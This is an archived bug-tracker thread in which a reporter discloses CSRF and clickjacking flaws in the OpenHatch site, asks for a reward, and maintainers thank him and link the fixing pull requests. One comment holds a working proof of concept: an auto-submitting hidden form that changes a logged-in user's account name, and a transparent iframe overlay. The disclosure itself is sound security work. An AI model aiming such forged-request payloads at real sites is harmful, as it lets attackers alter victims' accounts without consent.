Hey Guys,
I found vulnerabilty at your site,
Cross-site Request Forgery (CSRF) and Clickjacking vulnerability
Description:
Cross-site request forgery, also known as a one-click attack or session riding
and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website
whereby unauthorized commands are transmitted from a user that the website trusts.
Impact:
The impact of this can be anything from creating new data--which may be an
outright defacement, contain disinformation or direct users to another malicious
website--to deleting or altering existing data.
> Waiting to fixed ..
> all you need .. is to put csrf token in every forms.. :)
>
> hope i'll get any token of appreciation..
> Thanks ma'am !
>
>
> On Wed, Jan 15, 2014 at 4:27 PM, Asheesh Laroia <bugs@openhatch.org>wrote:
>
>>
>> Asheesh Laroia <asheesh@asheesh.org> added the comment:
>>
>> I'm surprised we're not using Django's built-in CSRF protection already!
>> pik4chu, thank you for reporting this!
>>
>> __
>> Roundup issue tracker <bugs@openhatch.org>
>> <https://openhatch.org/bugs/issue917>
>> __
>>
>
>
ma'am Asheesh ?
you will give a small token of appreciation?
On Fri, Jan 24, 2014 at 9:59 AM, Asheesh Laroia <bugs@openhatch.org> wrote:
>
> Asheesh Laroia <asheesh@asheesh.org> added the comment:
>
> No update yet, we've been very busy, but I hope we'll get to this soon!
> We're concerned about the impact this can have on users of the site.
>
> __
> Roundup issue tracker <bugs@openhatch.org>
> <https://openhatch.org/bugs/issue917>
> __
>
Yes, we can put you on the list for stickers! I'll ask you for an address over email later, when we're
closer to figuring out logistics for sending stickers. :)
>
> brittag <brittag@gmail.com> added the comment:
>
> Yes, we can put you on the list for stickers! I'll ask you for an address
> over email later, when we're
> closer to figuring out logistics for sending stickers. :)
>
> __
> Roundup issue tracker <bugs@openhatch.org>
> <https://openhatch.org/bugs/issue917>
> __
>
> how many stickers sir?
>
>
> On Sat, Jan 25, 2014 at 1:03 PM, brittag <bugs@openhatch.org> wrote:
>
>>
>> brittag <brittag@gmail.com> added the comment:
>>
>> Yes, we can put you on the list for stickers! I'll ask you for an address
>> over email later, when we're
>> closer to figuring out logistics for sending stickers. :)
>>
>> __
>> Roundup issue tracker <bugs@openhatch.org>
>> <https://openhatch.org/bugs/issue917>
>> __
>>
>
>
Comment by pik4chu:
Description: Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.
Impact: The impact of this can be anything from creating new data--which may be an outright defacement, contain disinformation or direct users to another malicious website--to deleting or altering existing data.
<html> <body onload="javascript:document.forms[0].submit()"> <body> <form action="http://openhatch.org/account/settings/edit_name_do" method="POST"> <input type="hidden" name="first_name" value="CSRF" /> <input type="hidden" name="last_name" value="CSRF" /> <input type="hidden" name="username" value="CSRF" /> <input type="submit" value="Submit form" /> </form> </body> </html>
<html><style> iframe { width: 800px; height: 500px; position: absolute; top: 0; left: 0; filter: alpha(opacity=50); opacity: 0.5; }
</style> <iframe src="http://openhatch.org/"></html>
Comment by paulproteus:
Comment by pik4chu:
hope i'll get any token of appreciation.. Thanks ma'am !
On Wed, Jan 15, 2014 at 4:27 PM, Asheesh Laroia <bugs@openhatch.org> wrote:
> > Asheesh Laroia <asheesh@asheesh.org> added the comment: > > I'm surprised we're not using Django's built-in CSRF protection already! > pik4chu, thank you for reporting this! > > __ > Roundup issue tracker <bugs@openhatch.org> > <https://openhatch.org/bugs/issue917> > __ >
Comment by pik4chu:
On Wed, Jan 15, 2014 at 4:47 PM, Jerold Camacho <jeroldcamacho.res@gmail.com > wrote:
> Waiting to fixed .. > all you need .. is to put csrf token in every forms.. :) > > hope i'll get any token of appreciation.. > Thanks ma'am ! > > > On Wed, Jan 15, 2014 at 4:27 PM, Asheesh Laroia <bugs@openhatch.org>wrote: > >> >> Asheesh Laroia <asheesh@asheesh.org> added the comment: >> >> I'm surprised we're not using Django's built-in CSRF protection already! >> pik4chu, thank you for reporting this! >> >> __ >> Roundup issue tracker <bugs@openhatch.org> >> <https://openhatch.org/bugs/issue917> >> __ >> > >
Comment by pik4chu:
On Wed, Jan 15, 2014 at 7:45 PM, Jerold Camacho <jeroldcamacho.res@gmail.com > wrote:
> https://docs.djangoproject.com/en/dev/ref/contrib/csrf/ > https://docs.djangoproject.com/en/dev/ref/clickjacking/# > > > On Wed, Jan 15, 2014 at 4:47 PM, Jerold Camacho < > jeroldcamacho.res@gmail.com> wrote: > >> Waiting to fixed .. >> all you need .. is to put csrf token in every forms.. :) >> >> hope i'll get any token of appreciation.. >> Thanks ma'am ! >> >> >> On Wed, Jan 15, 2014 at 4:27 PM, Asheesh Laroia <bugs@openhatch.org>wrote: >> >>> >>> Asheesh Laroia <asheesh@asheesh.org> added the comment: >>> >>> I'm surprised we're not using Django's built-in CSRF protection already! >>> pik4chu, thank you for reporting this! >>> >>> __ >>> Roundup issue tracker <bugs@openhatch.org> >>> <https://openhatch.org/bugs/issue917> >>> __ >>> >> >> >
Comment by paulproteus:
Comment by pik4chu:
On Fri, Jan 24, 2014 at 9:59 AM, Asheesh Laroia <bugs@openhatch.org> wrote:
> > Asheesh Laroia <asheesh@asheesh.org> added the comment: > > No update yet, we've been very busy, but I hope we'll get to this soon! > We're concerned about the impact this can have on users of the site. > > __ > Roundup issue tracker <bugs@openhatch.org> > <https://openhatch.org/bugs/issue917> > __ >
Comment by brittag:
Comment by pik4chu:
On Fri, Jan 24, 2014 at 4:26 PM, brittag <bugs@openhatch.org> wrote:
> > brittag <brittag@gmail.com> added the comment: > > Hi Jerold, you're listed on the "thanks" page now: > http://openhatch.readthedocs.org/en/latest/community/thanks.html > > __ > Roundup issue tracker <bugs@openhatch.org> > <https://openhatch.org/bugs/issue917> > __ >
Comment by brittag:
Comment by pik4chu:
On Sat, Jan 25, 2014 at 1:03 PM, brittag <bugs@openhatch.org> wrote:
> > brittag <brittag@gmail.com> added the comment: > > Yes, we can put you on the list for stickers! I'll ask you for an address > over email later, when we're > closer to figuring out logistics for sending stickers. :) > > __ > Roundup issue tracker <bugs@openhatch.org> > <https://openhatch.org/bugs/issue917> > __ >
Comment by pik4chu:
On Sat, Jan 25, 2014 at 1:08 PM, Jerold Camacho <jeroldcamacho.res@gmail.com > wrote:
> how many stickers sir? > > > On Sat, Jan 25, 2014 at 1:03 PM, brittag <bugs@openhatch.org> wrote: > >> >> brittag <brittag@gmail.com> added the comment: >> >> Yes, we can put you on the list for stickers! I'll ask you for an address >> over email later, when we're >> closer to figuring out logistics for sending stickers. :) >> >> __ >> Roundup issue tracker <bugs@openhatch.org> >> <https://openhatch.org/bugs/issue917> >> __ >> > >
Comment by bugZPDX:
Comment by pik4chu:
On Sunday, April 20, 2014, bugZPDX <bugs@openhatch.org> wrote:
> > bugZPDX <bugz42@gmail.com <javascript:;>> added the comment: > > Submitted pull requests. https://github.com/openhatch/oh-mainline/pull/243 > > ---------- > status: in-progress -> need-review > > __ > Roundup issue tracker <bugs@openhatch.org <javascript:;>> > <https://openhatch.org/bugs/issue917> > __ >
Comment by bugZPDX:
Comment by bugZPDX:
Comment by pik4chu:
On Fri, May 23, 2014 at 11:45 AM, bugZPDX <bugs@openhatch.org> wrote:
> > bugZPDX <bugz42@gmail.com> added the comment: > > Resolved with PR #247 https://github.com/openhatch/oh-mainline/pull/247 > > ---------- > status: need-review -> resolved > > __ > Roundup issue tracker <bugs@openhatch.org> > <https://openhatch.org/bugs/issue917> > __ >
Comment by ehashman:
I am also changing the status to 'needs-review', blocking on your receipt of the stickers. Please set this to 'resolved' when they arrive.
File at http://roundup-archive.openhatch.org/bugs/file642/unnamed by pik4chu File at http://roundup-archive.openhatch.org/bugs/file643/unnamed by pik4chu File at http://roundup-archive.openhatch.org/bugs/file646/unnamed by pik4chu File at http://roundup-archive.openhatch.org/bugs/file647/unnamed by pik4chu File at http://roundup-archive.openhatch.org/bugs/file648/unnamed by pik4chu File at http://roundup-archive.openhatch.org/bugs/file649/unnamed by pik4chu File at http://roundup-archive.openhatch.org/bugs/file650/unnamed by pik4chu File at http://roundup-archive.openhatch.org/bugs/file673/unnamed by pik4chu File at http://roundup-archive.openhatch.org/bugs/file680/unnamed by pik4chu
Status: need-review Nosy List: brittag, bugZPDX, paulproteus, pik4chu Priority: wish Imported from roundup ID: 917 (view archived page) Last modified: 2014-06-26.04:35:26